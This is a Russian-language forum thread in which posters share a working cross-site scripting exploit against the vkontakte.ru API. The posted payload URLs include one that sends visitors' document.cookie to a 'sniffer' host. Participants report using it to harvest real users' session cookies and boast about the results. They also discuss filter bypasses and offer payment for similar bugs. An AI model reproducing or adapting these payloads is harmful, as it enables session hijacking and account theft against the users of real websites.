|
Active xss vkontakte.ru
http://api.vkontakte.ru/api.php?v=2.0&sig=%3Cscript%3Ealert(document.cooki e)%3C/script%3E&format=JSON&api_id=517649&method=getAppF riends
Добейте http://forums.goha.ru/images/smilies/pandaredlol.gif |
Ты уверен, что это активка? =\
И в опере не катит =\ |
Да в Опере не пашет и в Internet Explorer тоже
|
слэш в закрывающем тэге экранируется, а так бы сработало
|
Изя лох :( это пассивка,
http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&form at=JSON&api_id=517649&method=getAppFriends |
А изя промазнулся, а изя проманхнулся :D
|
мб перенесете в приват? А то щас же школья набежит тут, а чо, а кто, а зачем это и т д...
|
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.
Я две нашел в более легких условиях и где досих пор пашет)) |
Это пассивка и пашет она под все браузеры
|
Цитата:
|
перенесите в приват!!!!!
|
поздно переносить, уже прикрыли
|
Цитата:
|
а толку, слеши фильтруют, никак ссылку ввести не получается)
|
Спасибо ребят, сейчас будем проводить апирацию "ПАПЬЯНЕ111"
|
Работает в Firefox:
http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.hr ef='http://sniffer?'%2Bdocument.cookie>&format=JSON |
в опере тож
|
я просто забыл что такое хекер и чем отличаются пассивные поцаны и активные
|
лучше б тему потерли
|
Удалите нах тему, или редактируйте свои посты, прикроют же...
|
Цитата:
:-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D :-D |
потрите посты) хотя уже поздно =//
______ upd: спасибо за XSS'ку)))) за сегодня уже 4к рейта набрал)))) ______ upd2: смотрю логи, а там даже куки чака))) :rolleyes: еще попался чел из АК47 белобрысый))) :D :rolleyes: |
прикрыли походу, у меня не работает уже =\
|
Угу, пофиксили
|
днем еще работало, бля...
|
кхм.. ну тёрли бы тогда чтоли отсюдова.. сами виноваты
|
не*** апать тему было
|
народ, а есть шанс немного переписать ее? всмысле можно повертеть с фильтрами или они образноговоря одним щелчком мыши применили свои мегакрутые фильтры для этого поля?
Короче говоря стоит ли овечка выделки? |
Цитата:
|
как бэ там тоже не дураки но всеравно спасябо изосу я дурова опхекал
|
какбы у меня появилось предложение жаль невовремя - надо было раз уже не захотели сразу тем утереть рассылать всем сообщения чтоб трындели "уже прикрыли" zzzz
Еще вопросик, а как с API вконтакте работать? Всмысле ручками потрогать все эти поля |
а у когонить такое вылетало?
<?xml version="1.0" encoding="utf-8" ?> - <error> <error_code>101</error_code> <error_msg>Invalid application API ID</error_msg> - <request_params list="true"> - <param> <key>v</key> <value>2.0</value> </param> - <param> <key>sig</key> <value>'; бывшее поле ввода хсс</value> </param> - <param> <key>format</key> <value>JSON";</value> </param> </request_params> </error> |
нет.
|
короче я сдесь чето помудился, зашол на api.vkontakte.ru/api.php
открыл исходник и что же там написано ? а написано там <?xml version="1.0" encoding="utf-8"?> <error>Invalid application API ID</error> к нашему скрипту http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.hr ef='http://sniffer?'%2Bdocument.cookie>&format=JSON там где v=2.0 я поменял на v=1.0 тоесть получился http://api.vkontakte.ru/api.php?v=1.0&sig=<iframe+src=.+onload=location.hr ef='http://sniffer?'%2Bdocument.cookie>&format=JSON теперь пишит {"error":"Invalid application API ID"} теперь потрепаюсь над этим может что нибудт и получиться...... |
Цитата:
|
XSS то работала! Не пойму нах в паблик было кидать ?)) Можно было в приват скинуть и реально подняться. Если ещё кто баги найдёт,пишите в личку,хорошо заплачу за подобные XSSы
--------- Изя , ты коммерчески не подкован )) |
Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
|
Цитата:
|
Цитата:
|
И мне! xD
|
| Время: 13:32 |